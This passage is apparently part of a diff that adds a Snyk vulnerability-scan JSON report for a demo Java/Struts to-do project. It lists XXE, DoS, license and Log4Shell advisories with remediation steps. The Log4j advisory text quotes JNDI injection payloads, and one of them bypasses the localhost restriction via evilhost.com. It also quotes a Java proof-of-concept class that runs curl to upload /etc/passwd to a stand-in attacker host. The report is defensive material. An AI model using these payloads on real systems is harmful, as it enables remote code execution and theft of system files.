"" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-01T19:12:29Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2018-08-21T14:16:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.900402Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/a822852", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:31.083245Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", + "epssDetails": { + "percentile": "0.79800", + "probability": "0.00664", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10683" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-hwj3-m3p6-hj38" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2022-05-10T12:56:27.582369Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-15T09:38:17Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2020-04-16T15:22:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.985080Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-JAVAXSERVLET-30449", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "David Jorm" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "javax.servlet:jstl", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", + "title": "NVD" + }, + { + "url": "https://access.redhat.com/security/cve/CVE-2015-0254", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "cvssV3BaseScore": 7.6, + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:43.270072Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "description": "## Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", + "epssDetails": { + "percentile": "0.94002", + "probability": "0.07046", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-0254" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-6x4w-8w53-xrvv" + ] + }, + "packageName": "javax.servlet:jstl", + "proprietary": false, + "creationTime": "2017-02-22T07:28:19.341000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-02-27T16:13:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "javax.servlet", + "artifactId": "jstl" + }, + "publicationTime": "2015-02-27T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.017447Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "javax.servlet:jstl", + "version": "1.2" + }, + { + "id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", + "type": "license", + "title": "CDDL-1.0 license", + "semver": { + "vulnerable": [ + "[1.2,)" + ] + }, + "license": "CDDL-1.0", + "language": "java", + "description": "CDDL-1.0 license", + "packageName": "javax.servlet:jstl", + "creationTime": "2024-06-18T08:06:13.191Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T08:06:13.191Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "javax.servlet:jstl", + "version": "1.2" + }, + { + "id": "SNYK-JAVA-OGNL-30474", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Tao Wang" + ], + "semver": { + "vulnerable": [ + "[,3.0.12)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.0.12" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "ognl:ognl", + "references": [ + { + "url": "https://github.com/jkuhnert/ognl/commit/ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.218889Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "description": "## Overview\n[`ognl:ognl`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22ognl%22) is a simple Expression Language (EL) for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `ognl:ognl` to version 3.0.12 or higher.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)\n- [GitHub Commit](https://github.com/jkuhnert/ognl/commit/ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92)\n", + "epssDetails": { + "percentile": "0.90602", + "probability": "0.02732", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3093" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "ognl:ognl", + "proprietary": false, + "creationTime": "2017-02-22T07:28:19.659000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-02T02:16:48.918000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "ognl", + "artifactId": "ognl" + }, + "publicationTime": "2016-06-02T02:16:48.918000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:50.033229Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "ognl:ognl@3.0.6" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28", + "ognl:ognl@3.0.13" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "ognl:ognl", + "version": "3.0.6" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", + "credit": [ + "Chen Zhaojun of Alibaba Cloud Security Team" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.1", + "2.12.2", + "2.15.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 10, + "functions": [ + { + "version": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/lookup/JndiLookup.java", + "className": "JndiLookup", + "functionName": "lookup" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3198", + "title": "Apache Jira Issues" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3201", + "title": "Apache Jira Issues" + }, + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/logging-log4j2/pull/608", + "title": "GitHub PR" + }, + { + "url": "https://github.com/Kirill89/log4shell-vulnerable-server", + "title": "PoC" + }, + { + "url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/", + "title": "Snyk Blog and Vulnerability Breakdown" + }, + { + "url": "https://www.exploit-db.com/exploits/51183", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:48:46.605332Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:58.520882Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:43.264835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:46.605332Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.520882Z" + } + ], + "description": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE).\nApache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n
Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n
For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n", + "epssDetails": { + "percentile": "0.99999", + "probability": "0.97556", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-44228" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-jfh8-c2jp-5v3q" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-10T10:08:46.155884Z", + "functions_new": [ + { + "version": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.lookup.JndiLookup", + "functionName": "lookup" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-12-10T10:02:55Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-10T10:10:01Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:25.500242Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.16.0)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.1", + "2.12.2", + "2.16.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f", + "title": "Apache Pony Mail" + }, + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": "https://twitter.com/marcioalm/status/1471740771581652995", + "title": "Twitter Post" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml", + "title": "Nuclei Templates" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 9, + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:32.295395Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- 